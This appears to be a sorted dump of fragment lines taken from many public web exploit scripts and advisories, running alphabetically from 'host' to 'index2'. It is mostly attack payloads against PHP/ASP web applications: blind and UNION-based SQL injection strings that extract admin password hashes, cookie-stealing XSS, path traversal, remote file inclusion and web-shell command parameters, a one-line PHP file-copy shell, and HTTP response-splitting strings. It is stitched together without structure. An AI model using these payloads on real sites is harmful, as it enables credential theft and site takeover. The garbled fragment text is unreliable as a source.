".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");
".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
".$host.$path."index.php?option=com_n-forms&form_id=".$fid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1 ),".$i.",1))=".$h."";
".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_seminar&task=View_seminar&id=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";
".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROM  jos_users LIMIT 0,1),".$i.",1))=".$h."";
".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
".$host.$path."index.php?PHPSESSID=$sessid\r\n";
".$host.$path."index.php?pilih=gallery&mod=yes";
".$host.$path."index.php\r\n";
".$host.$path."index.php?sid=49493&lang=it&action=ask HTTP
".$host.$path."index.php?site=news&showonly=%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")";
".$host.$path."index_topic.php?did=".$did." and (SUBSTRING((SELECT password FROM admin LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host.$path."js
".$host.$path."katalog.php\r\n";
".$host.$path."kgcall.php?engine=uploadzdj.php\r\n";
".$host.$path."kontakt.php\r\n";
".$host.$path."lg.php HTTP
".$host."".$path."".$listname."
'.$host.$path.'load
".$host.$path.$location."shell.php.'%20or%20'a'%20='a?command=".urlencode($command)." HTTP
".$host.$path."login.php HTTP
{$host}{$path}login.php\n";
".$host.$path."login.php?referer=index.php\r\n";
".$host.$path."login.php\r\n";
".$host.$path."main.php?g2_view=core.UserAdmin&g2_subView=watermark.UserWatermarks
".$host.$path.$main."?subaction=showcomments&id=".urlencode($articleid)."&archive=&start_from=&ucat=1& HTTP
".$host.$path."manager
".$host.$path."member.php?action=uploadform&cat_id=".$CATID."\r\n";
".$host.$path."member.php\r\n";
".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP
'.$host.$path.'mirrorfile.php?filename=cache
".$host.$path."mod
".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\
'.$host.$path; my $uagent = 'Perlnamigator'; my $timeut = '30'; my $errr00 = "[-]Can't connect to the host\n"; my $errr01 = "[-]Can't get the full path of the website\n"; my $errr02 = "[-]Can't get the table prefix\n"; my $errr03 = "[-]The php file doesn't exist\n"; if($cmd eq "exit"){ &the_end; } $req5 = get($helurl.'admin
".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid;
".$host.$path."news.php HTTP
".$host.$path."news.php\r\n";
'.$host.$path.'obrazy
[host] [path] -option (-delete,-change,-add)\n";
".$host.$path."?pilih=user&aksi=register",
".$host.$path."?pilih=user&aksi=register",);
".$host.$path."players-detail.php?id=".$user."'";
".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")";
{$host}{$path}plug.php?e=search&a=search\r\n";
".$host.$path."printview.php?board=1&topic=".$tid."'%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")
".$host.$path."prod.php?argv[1]=|".urlencode($command)." HTTP
".$host.$path."product.detail.php?id=".$id." and (SUBSTRING((SELECT password FROM auto_admin_settings_tb LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
".$host.$path.$profile." HTTP
".$host.$path."profile.php?mode=editprofile\r\n";
".$host.$path."profile.php\r\n";
'.$host.$path.'?q=upload
$host${path}register.php HTTP
".$host.$path."register.php?reg=2 HTTP
".$host.$path."\r\n";
$host$path\r\n";
".$hOsT.$pAtH."\r\n";
$host$path$script$sql HTTP
".$host.$path."search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch=&ddlCategory=".$cat."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")";
".$host.$path."search.php\r\n";
".$host.$path."search.php?search=".$sql."&ao=phrase HTTP
".$host.$path."setcookie.php?u=jimihendrix".$anumber."%00&cmd=".urlencode($command)." HTTP
"."$host"."$path"."settings.php"."?cmd="."$cmd";
$host$path$sql\n\n".
{$host}{$path}{$tmp}{$up_file}\n";
".$host.$path_to_shell.$filename."<br>";
".$host.$path."u2u.php\r\n";
".$host.$path.$uploaddir.strval($mytime+$i)."-cmd
".$host.$path."upload.php?Directory=.&sort=NomASC&action=upload\r\n";
".$host.$path."upload.php\r\n";
".$host."".$path."uploads
".$host.$path."users
".$host.$path."users.php?mode=login\r\n";
".$host.$path."users.php?mode=postuser HTTP
".$host.$path."users.php?mode=register\r\n";
".$host.$path."viewattach.php HTTP
".$host.$path."viewforum.php?mode=newmessage&reply=1&id=1&forumid=1 HTTP
".$host.$path."viewforum.php?mode=newmessage&reply=1&id=1&forumid=1\r\n";
".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores";
".$host.$path."wp-admin
' . $host . $path . 'wp-content
".$host.$path."wp-content
".$hOsT.$pAtH.$XpL."<br>"; refresh();
".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
'.$host.':'.$port;}
$host:$port
$host:$port";
'.$host.':'.$port.$path;
'.$host.':'.$port.$path;}
".$host.":".$port.$path;}
".$host.":".$port.$path."
".$host.":".$port.$path);
$host:$port".$path;
$host:$port$path"."
'.$hOsT.':'.$PorT.$pAtH;}
".$host.":".$port.$path."admin
$host:$port".$path."boards
".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))
".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");
".$host.":".$port.$path;} else {$p=$path;}
".$host.":".$port.$path."forum.php?req=search&unb236sess=\r\n";
$host:$port".$path."index.php";
".$host.":".$port.$path."index.php?op=vis_reg\r\n";
".$host.":".$port.$path."index.php?target=setpass&u=11&ph=\r\n";
".$host.":".$port.$path."index.php?target=setpass&u=".$uid."&ph=".$hash."\r\n";
".$host.":".$port.$path."login_register.php?action=register\r\n";
".$host.":".$port.$path."lostpwd.php\r\n";
$host:$port".$path."modules
".$host.":".$port.$path."modules.php?name=Your_Account\r\n";
".$host.":".$port.$path."newtopic.php?id=1\r\n";
$host:$port".$path."readme";
$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=all&author=0&results=25&mode=search";
$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=all&author=0&results=25&mode=search&order=";
$host:$port".$path."search.php?".$prepend."&datestart=&dateend=1&type=".$type."&author=0&results=25&mode=search";
$host:$port".$path."search.php?query=a+a+a&keyType=all&datestart=&dateend=&topic=".$_tpcs[$i]."&type=".$_types[$j]."&author=0&results=25&mode=search";
$host:$port".$path."staticpages
$host:$port$path"."userfiles
$host:$port".$path."userinfo.php?uid=$my_uid";
$host:$port".$path."userinfo.php?uid=$uid";
$host:$port".$path."user.php";
".$host.":".$port.$path."user.php\r\n";
$host:$port".$path."usersettings.php";
$host:$port".$path."users.php";
'.$host.':'.$port.$path.'viewattach.php<
$host:$port".$path."webservices
$host:$port".$path."wiki
".$host.":".$port.$p."browse_avatar.php\r\n";
$host:$port$reflog")) {
".$host.":".$p."post.php?bn=".$sitename[$x]."_".$forumname[$y]."\r\n";
" . $host . $res . "\015\012" .
".$host."\r\n";
 ) {$host =~ s
".$hosts."
hosts 
hosts%00
hosts.cgi
' + host + shell_path
host.tld
[host] [user id]\n";
[host] [user_id]\r\n";
".$host.$vic_dir;
hot
HotBrunette,-3+union+select+1,2,version(),4,5,6,7--+
hotel
hoteldetails.asp?id=[sqli]
hotel_habitaciones.php?HotelID=(SQL)
hotel_tiempolibre_ext.php?HotelID=4&NoticiaID=-1 UNION ALL
hot_links_sql.html
hotopentickets.sourceforge.net
hot_or_not
hotornot2.php
hot-or-not-clone-script
[hot_path]
hotspot-changepw.cgi
hot-things.net
hours
house
houseofhackers.net
housestyle
howex.php3?lvc_include_dir=[EV!L]
how.php
howtoasp.net
howtoasp.net   
how_to_buy.php 
hp_boastMachine
[hpc_path]
HP_DEV
hpe
hphp
hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg>'
hr_conf.php
href="author\
href="http:\
href.in
hregister.html" method="post" name="main" >
HSO_basic
hta
htaccess
.htaccess
.htaccess 
.htaccess%00
.htaccess%00&theme=advanced
htaccess.php?plan_id=35&domain=[SQL]
htaccess.php?plan_id=[SQL]
HTB23084 - Multiple vulnerabilities in Newscoop.
HTB23085 - Multiple vulnerabilities in Piwigo.
HTB23086 - Local File Inclusion in PluXml.
HTB23088 - ?ross-Site Request Forgery (CSRF) in TestLink.
HTB23096 - Blind SQL Injection in Webmatic.
HTB23113 - Multiple vulnerabilities in Subrion CMS.
HTB23115 - Multiple vulnerabilities in Template CMS.
HTB23117 - Multiple vulnerabilities in AContent.
HTB23118 - Multiple vulnerabilities in Banana Dance.
HTB23122 - Multiple vulnerabilities in BabyGekko.
HTB23125 - Multiple SQL Injection vulnerabilities in ClipBucket.
HTB23126 - Multiple vulnerabilities in Achievo.
HTB23132 - SQL Injection Vulnerability in ImageCMS.
HTB23133 - Multiple SQL Injection Vulnerabilities in Elite Bulletin Board.
HTB23144 - Multiple Vulnerabilities in Piwigo.
HTB23145 - OS Command Injection in CosCms.
HTB23147 - Path Traversal in AWS XMS.
HTB23150 - Multiple Vulnerabilities in KrisonAV CMS.
HTB23151 - Cross-Site Request Forgery (CSRF) in UMI.CMS
HTB23152 - SQL Injection in b2evolution
HTB23154 - Multiple Vulnerabilities in Exponent CMS.
HTB23155 - Multiple Vulnerabilities in OpenX.
HTB23155-openx-changeset-82710.diff
HTB23158 - Multiple Vulnerabilities in Kasseler CMS.
HTB23164 - SQL Injection in Cotonti.
HTB23165 - Multiple Vulnerabilities in BigTree CMS.
HTB23168 - SQL Injection in vtiger CRM.
htcmime.php?file=..
htdocs
htm2php.php?filename=..
html
html>
html> 
html> <
html>";
html";
html]
HTML
HTML]
html%0d%0a%0d%0a<html>This site in 0wned{
html%0d%0aContent-Length:%2
html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!<
html%0d%0aContent-Length:9%0d%0aHi to all
html  2           #\n";
html2text.php
html%3E
html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 
html5avmanager
html5demo
htmlarea
htmlarea.js.php?glb_sid=<script>alert(
html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+ 
html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1
html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
html_bottom_table.php?next=<script>alert(document.cookie)<
html_bottom_table.php?page_line=<script>alert(document.cookie)<
html_bottom_table.php?prev=<script>alert(document.cookie)<
html; charset='.$charset.'">
html;charset=iso-8859-
html; charset=iso-8859-1
html; charset=iso-8859-1">
html; charset=iso-8859-1" 
html;   charset=iso-8859-1">   <style
html;  charset=iso-8859-1">     <style
html; charset=iso-8859-1"> <style
html; charset=iso-8859-1"> <style type=
html; charset=ISO-8859-9><title>phpBB HACK<
html; charset=$ps_charset'>\n";
html; charset=utf-8">
html; charset=utf-8" 
html; charset=UTF-8"
html; charset=UTF-8">
html; charset=UTF-8" 
html; charset=windows-1251">
html; charset=windows-1252">
html; charset=windows-1254">
html; charset=windows-1256">
html; charset=windows-1256" 
Html [currentPageId parameter]
htmlcust
htmledit
htmleditor
htmledit.php?_POWL[installPath]=[Evil_Script>:]
".htmlentities($host.$path)."
".htmlentities($hOsT.$pAtH)."html
".htmlentities($hOsT.$pAtH)."suntzu.php?&cmd=[your command]            <br>
".htmlentities($hOsT.$pAtH.$XpL)."&cmd=[your command]                  <br>
html>  EOD; 
HtmlGroupSearchRenderer.class.php?gfwww=[Shell]
html.inc.php?[USER_LANGUAGE]=[RFI]
HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]
html)\n";
html}&password=foobar
html.php?current_dir=..
html.php?current_dir=..&filename=[file]
html.php?current_dir=http:
html.php?GLOBALS[pie][library_path]=[evilcode]
.html , producing the classic:
html; '><script language='JavaScript'> alert('wrong.'); <
HtmlSearchRenderer.class.php?gfwww=[Shell]
htmltags.php?datei=.
htmltonuke.php?filnavn=ftp:
htmltonuke.php?filnavn=[SCRIPT]%20example.html
HTML_toolbar.php
html (Upload shell .php.giff)
html_version.php?ECID=[SQL]
<html xmlns="http:\
htm.php?current_dir=..
htm.php?current_dir=..&filename=[file]
htp
.htpasswd
http
^http
^(?:http:\
^((?:http:\
^(http:\
^http:
^http:\
^http\:\
(?:http:\
(http:\
[http:\
http:
http:\
http'
http"
http\:\
 HTTP
HTTP\
httpd
httpd:
httpd.apache.org
httpd.conf']
httpd.conf%00 
httpd -DSSL";
httpdocs
', http_get('openconf.php'))) die("\n[-] Failed: submission edit disabled\n");
 http_gpc_send("GET", $victHost, $victPort, $victPath."
http_gpc_send("POST", $victHost, $victPort, $victPath."
(http|https):\
http if you would like to see the logo. 
(http.*?)index.*?showforum=(.*)
 http method) **********
", http_post("author
',http_recv(http_send($host, 80, $headers)) , $matches);
^https?:\
' : 'https:
https'
https"
", http_send($host, $packet)))
", http_send($host, $packet)));
", http_send($host, $packet), $auth)) die("\n[-] Login failed!\n");
", http_send($host, $packet), $cookie);
', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n");
", http_send($host, $packet))) die("\n[-] Edit password required?!\n");
", http_send($host, $packet))) die("\n[-] Incorrect username or password!\n");
', http_send($host, $packet))) die("\n(-) login failed!\n");
", http_send($host, $packet))) die("\n\n[-] Exploit failed...\n");
", http_send($host, $packet))) die("\n[-] Plugin creation failed!\n");
', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
', http_send($host, $packet))) die("\n[-] Upload failed!\n");
", http_send($host, $packet))) die("\n[-] Upload failed!\n");
', http_send($host, $packet), $match);
", http_send($host, $packet), $match);
", http_send($host, $packet), $match))
", http_send($host, $packet), $match)) die("\n[-] Login failed...\n");
", http_send($host, $packet), $match)) print "vulnerable!\n";
', http_send($host, $packet), $m)) die("\n[-] Path not found!\n");
', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");
', http_send($host, $packet), $m) ?  $m[1] : '';
', http_send($host, $packet), $m) ? $m[1] : '';
", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");
", http_send($host, $packet), $split);
", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer
", http_send($host, sprintf($packet, "foo")), $match);
http:xxdaim.ruxmonzterxforum
hu
huh?
hu.inc.php?LANG=[evilc0de]
humayuns
humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
hustoj
hv
hwd
".$hy;
HY60R.png
hyper
hypersilence.net
HZAN_pickercal.aspx?calsize='
i
" . $i);
".$i);
(.+?)$}i) {
##i;
i><
i;
i';
i)
i) {
i062.radikal.ru
i076.radikal.ru
i206
i215
i420
i516
iamge_utils.php?command=[your command]
i and $uid =~ 
i and $userid =~ 
iaprcommence
i", $argv[1], $matches);
i',$argv[1]) or empty($argv[1])) athos();
i',$argv[1]) or !is_numeric($argv[2])) $search->argv();
i && $auth && $myid)
iAuto
ibase
~ibd
IBD2000
ibd-micro-cms-static-content-manager.html
iboutique
iboutique  ) 
i><br>
i><br><br>
ibrowser
ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
ibrowser.php\r\n";
icash.ch
icebb.net
ice\.breaker\.free\.fr
iCMS
icon.php?status=-99' UNION SELECT
icons
icopyright_xml.php?id=1' AND 1=1--%20
[ic_path]
icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
id
 id
/?id=..
&id=([0-9]{0,30})
/?id=0&pg='<script>alert(123);<
id=1
id='1
ID=-1
ID=1--
id,104
id-10.html
id,1175.html
/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+
/?id=16
id,170
/?id=1&f=
/?id=1&f=guestbook&m=addand selects either the
/?id=1&f=guestbook&m=addand submits the form
/?id=1+&f=guestbook will
id,2088.html  
id%20like%201
/?id=22
/?id=22&entry_id=-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user--&mod_action=detail
/?id=22&entry_id=[SQL-injection]
/?id=234
id,2661.html
id27
id28
id,2810.html
id,2874
 -id=2\n";
/?id=4
id,4
id,47
id=4904
id,491
/?id=58
/?id=598&s=info
/?id=621&s=info
/?id=682
id:7059wc8637mzd9966hnb3dgl415413d7541q4032zp43943532ija77112342xd4961670729851147
/?id=85
/?id=86
/?id=AySystemWCS27stable
iDB
/?id=blah
/?id=bluah
[IdeaBox_path]
ideabox.phpoutsourcing.com
identities.inc
identity.php
ident.php?id=[MEMBERID]&pass='%20OR%20''='
idevaffiliate
idevnetwork.127.0.0.1:1336
idev-rentals
idev-rentals.php )
ID='HOUS001
/?id=[ID]&f=guestbook&m=add
ID='INTX007812
[id]_logo_your_shell.php
id_membre=1
 [id]'          . "\n".
[id]_offer_your_shel.php
idoit
[id].php
id.php?id=1013
id.php?id=1103
id.php?id=1140)
{id}.php where {id} 
id_random.jpg
/?id=[REMOTEFILE]
IdRk=1
ids
IDS
ids-admin.php
[id]shell.php
id_shell.php
/?id=[SQL]
/?id=[SQL]                       																		||
id_thumb_evil.php
id_user,password
[id]your_shell.php
ie_pngfix.js
if-cms
 - I figured the cat's out of
i && $file !~ 
") if $proxy ne '';
iframe>
iframe><
iframe> 
iframe> !
iframe> !<
iframe>');
iframe>) 
IFRAME
IFRAME>
IFRAME> 
iframe%3E
iframe%3E>
iframe%3E 
IFRAME%3E
IFRAME%3E 
iframe%3E%22;%3C
IFRAME%3E&f=6 
iframe%3E&selmonth=April>
iframe&gt;&amp;sortby=rating
iframe&gt;" name="name" type="text" 
iframe><input type=hidden name=content_only value=1 
iframe>, in the field Event Title - Event Location Fields.
iframe>, in the fields category name.
iframe>, in the fields package name or package description
iframe>, in the fields Title, Caption, Description, Location
iframe> ... or 
iframe> ... or >"<script>alert(document.cookie)<
iframe.php?field=pass&module=users
iframe.php?field=username&module=users
iframe.php?file=ftp:
iframe><scri
iframe><script>alert(123);<
iframe><script>alert("XS
iframe>&sortby=date 
"><iframe src="banner.php-Dateien
IF((SELECT%20ASCII(SUBSTR(customers_email_address,1,1))%20FROM%20customers%20WHERE%20customers_id=1)=97,BENCHMARK(100000000,MD5(1)),1)--%20.php?
  If there is a right of entry you can fill shell. <?php copy($_GET['i'],$_GET['o']); ?>
 If there isn't the devotion Success there... : )
 if $url =~ 
igaming
iGaming
iGamingCMS1.5
igamingpath
ig-calendar
' . $ighost . $igcgi;
$ighost$igpath
igloo
[Igloo_path]
ignition
[ignition1.2]
[ignition1.3]
ignor3
ignum.dl.sourceforge.net
ig_shop
ig-shopping-cart.html
iHACK.pl
i_head.php?home=[SHELL]
iht.li
i', http_send($host, $packet)))
i", http_send($host, $packet))) die("\n[-] Exploit failed...\n");
i", http_send($host, $packet))) die("\n[-] Registration failed...\n");
i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
i", http_send($host, $packet), $found);
i", http_send($host, $packet), $html);
i", http_send($host, $packet), $m);
i", http_send($host, $packet), $split);
i", http_send($host, sprintf($packet, $val)))) break;
iindex.php?option=com_wallpapers&act=albums&cid=-1+UNION+SELECT+1--
iindex.php?params=profile
ijoomla-magazine
iJoomla.Magazine.v.3.0.1-_TKT_
iL4UkPk6YK
ilchClan105
 ile baslayan:",
 ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI
ilias.php?col_side=right&block_type=pdnotes&rel_obj=0&note_id=1&note_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI
ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI
ilohamail
IlohaMail-devel
im
image
Image
image%00
image1%27SQL_CODE.html
imagealbum.sourceforge.net
imagearchive
imagebank
image_desc.php?id=[SQL]
image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users
image-editor-52
Image [file parameter]
Imagefileupload.php
imagegallery
image_gallery
Image_gallery
ImageGallery
ImageGallery [filelist cookie]
image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
image_gallery.php?page=image-detail&album=1&image=[exploit]
image-gallery-with-slideshow
imagehost
imagehost1.1
[image_id].php?cmd=dir
imagelibrary
ImageManager
ImageManager.php?mosConfig_absolute_path=Evil-script?
Image [name of an arbitrarily supplied request parameter]
imagepg.php?_SERVER[DOCUMENT_ROOT]=
image.php
image.php (2 Upload Ev!l)
image.php?f=..
image.php?file=597_shell.php&width=500
image.php?file=xxx_shell.php&width=500
image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users--
image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users--
image.php?image=<script>alert('y3nh4ck3r+was+here!')<
image.php?lang=..
image.php?page=1&gallery_id=1&image_id=[SQL] 
image.php?page=1&search_type=and?_id=78(SQLI)
image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11
image.php?src=MALICIOUS_URL
image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=
image.php  ** too Upload Evil
image.php?url=..
image.php?url=[EVIL_CODE]???
images
_images
images">
images%00", $cookie);
imageshack.us
images.php
images.php?action=create\r\n";
images.php?action=delete&image_id=[VID]
images.php?cid=[SQL]
images.php?delete=..
images.php?dir=..
images.php?dir=c:
images.php?dir=c:AppServ
images.php?dir=c:WINDOWS
images.php?donsimg_base_path=[SHELL]
images.php?q=user&id=1999
images.php ** to Upload Evil
images.sourceforge.net
imagestore
image_upload.php
image-upload.php");
image_upload.php?sbp=[evil_script]
imageview
image_viewer.php?dir=
imageview.php?desc=<
imageview.php?filename=<iframe>
Image_voting
imagexp.jpg
imagin
imanager
imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
imemc.org
img
img><
img ] 
img]
img] 
img] [
img][
IMG
IMG] 
img10
img10.imageshack.us
img138
img138.imageshack.us
img163
img163.imageshack.us
<img%20src="javascript:alert(document.cookie)"> 
<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>
img2ascii
img>404">
img508
img508.imageshack.us
img523
img523.imageshack.us
img541
img541.imageshack.us
img58
img58.exs.cx
img830
img830.imageshack.us
img89
img89.imageshack.us
[imgallery]
IMGallery path
img.gif URL
img.gif"width="750"height="750"onmouseover="
".$img.".jpg&username=";
img.php?file=[LFI]%00
img.php?i=[CODE]
img.php?id='+union+select+1,2,user()
img.php?spaw_root=[evil script]
img_quiz
imgsize.php?img=..
imgsize.php?img=[file]
"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
<img src=javascript:alert('hi')>
IMG]]`style=background:url("javascript:[code]") [
img_upload.php (2 upload Ev!l)
imgupload.php ==>>> upload your c99 shell
immagini
immuniweb
immunizations.php?mode=add&id=&pid=98&form_immunization_id=6&administered_date=2010-12-26&manufacturer=&lot_number=&administered_by=Administrator%2C+&administered_by_id=1&education_date=2010-12-26&vis_date=2010-12-26&note=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E
imoveis.php?id=20
impex
ImpExData.php?systempath=
implementation
impleo
Import.Admin.class.php?_CONF[path]=[Evil_Script]
important-security-bulletin-pre-announcement-2
importer
importer.php?what=defaults.php
importer.php?what=defaults.php%00.js
importers
ImportExport
import-export.php
import_handler.php?gfplugins=[Shell]
import-mt.php?basepath=foo&inc_path=https:
import.php                                           #
import.php?gfplugins=[Shell]
import.php" % rhost)
imports
importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=..
import_utils.php?gfcommon=[Shell]
impressum.php?lang=[LFI]
imprimir.php?codigo=1 and 1=1 <= TRUE
imprimir.php?codigo=1 and 1=2 <= FALSE
imprimir.php?codigo=[BLIND]
imprimir.php?id=1'                                              #
Imprint.php):
in
InactiveAccountsPage.class.php?base_path=[evil_scripts]
inajob.no-ip.org
' in argv[1] :
inattack.ru
i_nav.php?home=[SHELL]
in <b>(.*)<\
inbox
inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8--
inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C
inbox.php?action=send' method="post">
in <b>(.*)themes
in <b>(.*)tiki-rss
inc
_inc
inc__
inc_accountlistmanager.asp
inc_act
inc_catalogmanager.asp>
[incCMS_path]
inc.cp.php?sfx=
incele.php?incele=4
inc_header.php?gTopNombre=?><script>alert(document.cookie)<
incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.coo kie%29;%3C
inc.is_root.php?is_projectPath=[evilc0de]
incl
inc.lib.php?sfx=
inc_listado.php?orden=titulo
include
 include 
Include
include_calendar.php
include&filename=conf.php
include.html.
include.html?lang=[file]%00 
include-locations.inc
include_me.php?language=[LFI]
include_mode
include_once.php?
include.php
include.php?_APP_RELATIVE_PATH=[ShellCode]
include.php?cct_base= [inj3ct0r sh3ll]
include.php?db_driver=..
include.php?file=atk
include.php?gorumDir=[evil_scripts]
include.php?path=
include.php?path=c:\boot.ini%00.php 
include.php?path=contact.php&contact_email="><script>alert(123);<
include.php?path=content
include.php?path=contentarchive&type=1                           |\n";
include.php?path=guestbook
include.php?path=login
include.php?skindir=[evilCode]
include.php?start=1&skindir=[evilCode]
includepollresults.php?config[cookieprefix]=&w3t_language=..
includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
includes
Includes
include_Sito_PHP
includes.php?CMS_ROOT=[Evil> Script]
includes \r\n";
include_stream.inc.php?include_path=[SHELL]
include_this
include with
inclusionhunter.altervista.org
inclusionService.php?CabronServiceFolder=[EvilTxt]%00
incontent
inc.php
/?inc=projects
inc_script
inc_securedocumentlibrary.asp
inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=inc.thcms_admin_dirtree.php%00
/?ind[]
ind3x.php?action=vthread&forum=12&topic=114
ind3x.php?action=vthread&forum=12&topic=80
index
index 
index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--
index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--
index1.php?page=[SQLi]
index2.php
index2.php?artikel=3&target=.
index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin--
index2.php?category="><script>alert(document.cookie);<
index2.php?&cod=1&ac=a1&tituloSc=<script>alert(
index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere
index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2
index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere
index2.php?id=2 [ SQL Injection ] &mainid=2
  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web1_brugere
